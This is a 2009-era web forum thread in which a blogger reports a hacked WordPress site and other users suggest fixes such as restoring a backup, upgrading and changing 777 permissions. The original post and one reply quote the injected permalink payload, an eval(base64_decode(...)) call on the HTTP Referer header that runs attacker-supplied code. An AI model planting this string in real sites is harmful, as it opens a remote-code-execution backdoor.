14 {{ upvoteCount | shortNum }}
14 {{ upvoteCount | shortNum }}

I think my site was hacked- Anybody seen this?

by sbucciarel Banned
12 replies
I was going to post to my blog to add some sites for sale and noticed this in my permalinks for my posts

Permalink: http://nichebloggingtreasure.com/2009/08/09/debt-reduction...-blog-for-saledebt-reductioncredit-repair-niche-blog-for-sale/%&({${eval(base64_decode($_SERVER[HTTP_REFERER])) } }|.+)&%/

I've never seen this and don't know what it is but my page returns a bad request when you click on it.

Did a test post and it also adds all that crap at the end.

Anybody know what this is and how to fix it?
#hacked #site
  • Profile picture of the author john_kennedy
    What version of WP are you running? You should be at 2.8.4. To fix it have your webhost restore your account to before this happened.
    {{ DiscussionBoard.errors[1197509].message }}
  • Profile picture of the author NadinRath
    Here's the step by step procedure that helped me clean up my site!

    Wordpress Permalink & Rss problems

    Hope it helps.
    {{ DiscussionBoard.errors[1197539].message }}
  • Profile picture of the author sbucciarel
    Banned
    Seems like a hack. Fortunately I had a database backup and deleted the database and re-imported the good database and it's all fixed now. Guess I'll have to upgrade the Wordpress version, even though I hate the new version
    {{ DiscussionBoard.errors[1197610].message }}
  • Profile picture of the author Louise Green
    If you have any files chmod 777 change them to 755, change all passwords too.

    Very sorry to hear about this and hope things work out for you.
    Signature
    IMPORTANT MESSAGE: I'm currently on vacation & will answer all messages when I return - Happy Holidays!!
    {{ DiscussionBoard.errors[1197644].message }}
  • Profile picture of the author sbucciarel
    Banned
    Now that I've upgraded Wordpress I'm experiencing all the problems that made me NOT upgrade Wordpress ... Nothing works. Link to add tags doesn't work, the quick edit link doesn't work and on and on ....
    {{ DiscussionBoard.errors[1197912].message }}
    • Profile picture of the author uclaboyz
      Originally Posted by sbucciarel View Post

      Now that I've upgraded Wordpress I'm experiencing all the problems that made me NOT upgrade Wordpress ... Nothing works. Link to add tags doesn't work, the quick edit link doesn't work and on and on ....
      Simply upgrading WP won't fix it... try this:

      Wordpress MySQL Injection - Permalink hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]
      Signature
      http://www.HotFreeSamples.com - Get free product samples.
      {{ DiscussionBoard.errors[1199657].message }}
      • Profile picture of the author sbucciarel
        Banned
        Originally Posted by uclaboyz View Post

        Simply upgrading WP won't fix it... try this:

        I fixed the hack yesterday. I had a database backup and that fixed it. The problem I am having is the new Wordpress version doesn't work for me. The drag and drop widgets don't drag and drop, drop downs don't drop down, links don't work as explained in my previous message. This is why I avoided upgrading Wordpress to start with.
        {{ DiscussionBoard.errors[1199799].message }}
  • Profile picture of the author john_kennedy
    There is nothing wrong with 2.8.4. I have close to 50 websites all running this version and have none of the issues you mention.
    {{ DiscussionBoard.errors[1199910].message }}
    • Profile picture of the author sbucciarel
      Banned
      Originally Posted by john_kennedy View Post

      There is nothing wrong with 2.8.4. I have close to 50 websites all running this version and have none of the issues you mention.
      But I have all the issues I mentioned and more and have no idea why, so until I find out why, the new version of Wordpress does me little good.
      {{ DiscussionBoard.errors[1199924].message }}
  • Profile picture of the author thegamecat
    If you're going to use Wordpress you MUST learn how to secure it. There are numerous guides to help you.

    Leaving anything outside an upload directory as chmod 777 will almost certainly result in a hack.

    Then there is the Gumbler virus - its horrible.

    Stay smart and you'll stay safe.
    {{ DiscussionBoard.errors[1200123].message }}

Trending Topics